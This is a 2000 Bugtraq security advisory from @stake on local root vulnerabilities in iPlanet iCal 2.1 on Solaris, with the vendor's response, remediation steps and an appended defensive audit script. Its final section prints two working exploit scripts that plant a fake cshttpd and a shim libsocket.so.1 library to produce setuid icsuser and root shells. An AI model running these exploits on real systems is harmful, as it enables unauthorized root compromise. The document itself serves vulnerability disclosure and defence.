From advisories@ATSTAKE.COM Thu Oct 19 11:27:43 2000
From: "@stake Advisories"
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Tue, 17 Oct 2000 11:04:30 -0400
Subject: [BUGTRAQ] CORRECTION: @stake Advisory: Multiple Vulnerabilities in iCal 2.1 (A100900-1)

In the Detailed Description section of this advisory we inadvertently specified 'xhost -' as the problematic command that the iCal install script executes. The command it actually executes is 'xhost +'. The advisory below contains this correction. We would like to thank Eric Sherrill [sherrill@ti.com] for bringing this to our attention.

@stake, Inc.
www.atstake.com
Security Advisory

Advisory Name: Multiple Vulnerabilities in iCal 2.1
Release Date: 10/09/2000 (Corrected 10/17/2000)
Application: iPlanet's iCal version 2.1 Patch 2
Platform: Solaris 2.6
Severity: Local attacker can obtain root access
Author: Silicosis [silicosis@atstake.com]
Vendor Status: Vendor has patch available
Web: www.atstake.com/research/advisories/2000/a100900.txt

Executive Summary:

iPlanet's iCal, a multiplatform calendaring server, introduces a number of vulnerabilities to the system on which it is installed. These vulnerabilities, ranging from poor file permissions to insecure programming practices, allow local attackers to obtain root access and remote attackers to monitor keystrokes.

Overview:

During the software installation process, two of the vulnerabilities are introduced to the system. The first involves removing any access control mechanisms placed on the server's X server. The second involves poor file permissions on the installed software, allowing local users to modify or replace shell scripts that will be executed by the root user.
Two more vulnerabilities exist in a suid-root binary, 'csstart', that is executed upon startup. Due to insecure programming practices, it is possible for a local user to elevate their privileges and then use this access to obtain root privileges.

Detailed Description:

The first vulnerability involves using a GUI to install the iCal software, which is the default method. Although a second, command-line-only method exists that avoids this vulnerability, it is not mentioned in the documentation contained within the distribution tar file. When performing an installation using a GUI, the setup script executes 'xhost +' on the system, which removes all access control from the system's X server. Without access control in place, external attackers can connect to the X server and monitor keystrokes and obtain screen images using common, publicly available tools. This vulnerability can be avoided by executing the installation script with the '-nodisplay' option.

The second vulnerability involves installed files with poor file permissions. After installation, a total of 289 files exist with world-writable permissions. Of these world-writable files, the following is executed by root during system boot-up and shutdown:

-rwxrwxrwx 1 icsuser icsgroup /opt/SUNWicsrv/cal/bin/iplncal.sh

On Solaris, /etc/rc3.d/S94sunwicsrv executes /etc/iplncal.sh, a symlink pointing to /opt/SUNWicsrv/cal/bin/iplncal.sh. Due to the world-writable file permissions, normal users on the system can modify this file and insert or delete commands that will be executed by root every time the system is started or stopped. To prevent users from modifying this file, administrators should first remove the world-writable bit and change the ownership of the file to root. Administrators should also change the ownership of the '/opt/SUNWicsrv/cal/bin' directory to root, to protect against this attack when it is used in conjunction with the next vulnerability.
The third vulnerability involves a suid-root binary that is also used in the startup/shutdown process. The file, /opt/SUNWicsrv/cal/bin/csstart, contains a programming flaw that enables local users to execute commands as the "icsuser" user. Although the file is suid-root, the program drops its user-id to "icsuser" before the flaw is reached. The flaw is that the program blindly executes the "cshttpd" web daemon out of the current directory. To exploit this, simply create a shell script called 'cshttpd' in your current directory and execute the csstart program. Any commands placed in this script will be executed with the icsuser's effective user-id. By compromising the icsuser we can now create and modify files within the iCal installation directories. Using this access we can compromise the root user.

Running the csstart program as root and trussing it, we note the fourth vulnerability: one of the first things the program does as root is try to open a number of libraries in a number of places; if it cannot find a library it falls back to the system copy:

7703: open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT
7703: open("../lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT
7703: open("/usr/lib/libsocket.so.1", O_RDONLY) = 4
7703: open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT
7703: open("../lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT
7703: open("/usr/lib/libnsl.so.1", O_RDONLY) = 4

Because the default permissions on the installation directories have everything owned by the icsuser, we can place a shim library that will be loaded before the real library. This shim library will contain modified functions which will execute commands of our choice, as root, the next time the daemon is started. Proof of concept tools have been created to do just this, and are provided below.

Interim Solutions:

In order to protect against the first vulnerability, install the iCal service using the command-line only method.
This involves running the installation script with the '-nodisplay' argument. If iCal was already installed on a system that is running an X server, administrators should check the status of the access control mechanisms by running the "xhost" command. Access control should be enabled, not disabled. More information about the '-nodisplay' argument can be found within the online documentation at http://www.iPlanet.com.

To protect against the second and third vulnerabilities, administrators are advised to change the ownership of the /opt/SUNWicsrv/cal/bin/ directory to root. Administrators should also change the ownership of any file that will be executed as root during the startup or shutdown process.

Vendor Response:

We contacted Netscape via email and they were very responsive to our findings. The following is a description of how they have fixed the problems.

Netscape:

iPlanet Calendar Server (iCS) Support greatly appreciates these issues being brought to our attention. We are happy to report that these issues do not occur in our impending release of the iPlanet Calendar Server 5.0 product. For the iCS 2.1 product, an immediate Hotfix is available through the iPlanet Support Channel and will be bundled with the iCS 2.1 Patch-04 Release.

Because of the Web Based Architecture for the iPlanet Calendar Server, the exposure to existing customers appears to be minimal through the design of limited HTTP access to the server, or common network security practices. iPlanet Calendar Server users are not granted login access to the Server Host by default, and login access to the Server Host would be required to exploit any of these potential issues.

Specific Issues:

1. X Server access control disabled during install.

The install process has been changed so that the system will post a message about utilizing the '-nodisplay' flag rather than attempting to gain access to the X Server directly.

2. Poor File Permissions.
Unfortunately, a number of text data files were installed with world-writable permissions. While they do not pose a functional threat, they have been secured to prevent tampering. The file permissions and ownership have been set accordingly. The permissions on the shell script file iplncal.sh have been changed to prevent unprivileged user access, should the user gain login shell access to the iPlanet Calendar Server.

3. Set uid root binary, csstart, behavior.

The csstart program has been revised to explicitly execute the iPlanet Calendar Server cshttpd daemon. Further security measures were also added to enforce that the correct iPlanet Calendar Server Libraries are utilized rather than possible user-substituted routines. These changes, along with the packaged file ownership and permission changes, make a stronger csstart and cshttpd, secured against the concerns expressed.

Proof of Concept Tools:

There are two scripts below. The first obtains an icsuser shell. The second is used to obtain root access the next time iCal is stopped or started; it should be run once you've obtained the shell and have become the icsuser. This second script creates a shim libsocket.so.1 library with a modified socket() function that then executes a shell script as root.

[begin: obtain-ics.sh]
#!/bin/sh
#
# Simple proof of concept exploit used to obtain icsuser shell.
#
# -sili@atstake.com
#
INSTDIR=`cat /etc/iplncal.conf`

# csstart runs ./cshttpd from the current directory as icsuser
cat > cshttpd << FOOFOO
#!/bin/sh
cp /usr/bin/ksh ./icsuser
chmod 4755 ./icsuser
FOOFOO

chmod 755 ./cshttpd
echo "Executing csstart...."
$INSTDIR/cal/bin/csstart -v -p 1 -a 2 2>/dev/null
sleep 1
ls -al ./icsuser
[end: obtain-ics.sh]

[begin: obtain-root.sh]
#!/bin/sh
#
# Simple iCal exploit. Become icsuser by running the shell created with the
# obtain-ics.sh script, and then run this shell script. The next time that the
# service is started by root (ie. system reboot), a root owned suid shell will
# be created: /tmp/r00tshell.
#
# -sili@atstake.com
#
INSTDIR=`cat /etc/iplncal.conf`

#######
#Create the shim library..
cat > libsushi.c << FOEFOE
/* libsushi
   compile: gcc -shared -nostartfiles -nostdlib -fPIC -o libsushi libsushi.c */
#include <unistd.h>

int socket(void)
{
    setuid(0);
    execl("./icalroot", "icalroot", 0);
    return 0;
}
FOEFOE

#####
#create the shell script we'll be executing as root..
cat > $INSTDIR/cal/bin/icalroot << FOOFOO
#!/bin/sh
cp /usr/bin/ksh /tmp/r00tshell
chmod 4755 /tmp/r00tshell
rm $INSTDIR/cal/bin/icalroot
rm $INSTDIR/cal/bin/libsocket.so.1
FOOFOO

#####
#make sure script is executable; compile library & put in place..
chmod 755 $INSTDIR/cal/bin/icalroot
gcc -shared -nostartfiles -nostdlib -fPIC -o libsushi libsushi.c
cp ./libsushi $INSTDIR/cal/bin/libsocket.so.1
sleep 1
ls -l $INSTDIR/cal/bin/libsocket.so.1
ls -l $INSTDIR/cal/bin/icalroot
echo ".. Now wait for the iCal service to start up again"
[end: obtain-root.sh]

For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.
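An added audit script, not part of the advisory or of iPlanet's software, that checks the three conditions the Interim Solutions section asks administrators to verify: world-writable files under the install root, the ownership and mode of the boot-time script reached through the /etc/iplncal.sh symlink, and the X server access-control state reported by xhost. It assumes the advisory's directory layout; the expected-owner argument of check_boot_script defaults to root.

```shell
#!/bin/sh
# Added defender-side audit for the iCal 2.1 issues above (not @stake's or
# iPlanet's code). Assumes the advisory's layout: install root read from
# /etc/iplncal.conf, boot script reached through the /etc/iplncal.sh symlink.

# Count regular files under install root $1 that are world-writable; the
# advisory found 289 such files after a default install, so expect 0.
count_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | wc -l | tr -d ' '
}

# Follow one symlink level using ls -l (readlink is not on old Solaris).
resolve_link() {
    if [ -L "$1" ]; then ls -l "$1" | sed 's/.* -> //'; else printf '%s\n' "$1"; fi
}

# A script root runs at boot or shutdown must be owned by $2 (default root)
# and must not be writable by group or others. Returns 0 if safe, 1 if not.
check_boot_script() {
    f=$(resolve_link "$1"); want=${2:-root}
    [ -f "$f" ] || { echo "missing: $f"; return 1; }
    owner=$(ls -ld "$f" | awk '{print $3}')
    [ "$owner" = "$want" ] || { echo "owner is $owner, not $want: $f"; return 1; }
    # -perm -022 would match only when both bits are set, so test each bit.
    if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
        echo "group- or world-writable: $f"; return 1
    fi
    return 0
}

# Read xhost output on stdin; return 0 when access control is disabled, the
# state the GUI installer's 'xhost +' leaves behind.
xhost_access_disabled() {
    grep -qi 'access control disabled'
}

# Usage on a live host (run as root so every file is readable):
#   INSTDIR=$(cat /etc/iplncal.conf)
#   echo "world-writable files: $(count_world_writable "$INSTDIR")"
#   check_boot_script /etc/iplncal.sh
#   xhost 2>/dev/null | xhost_access_disabled && echo "X access control is OFF"
```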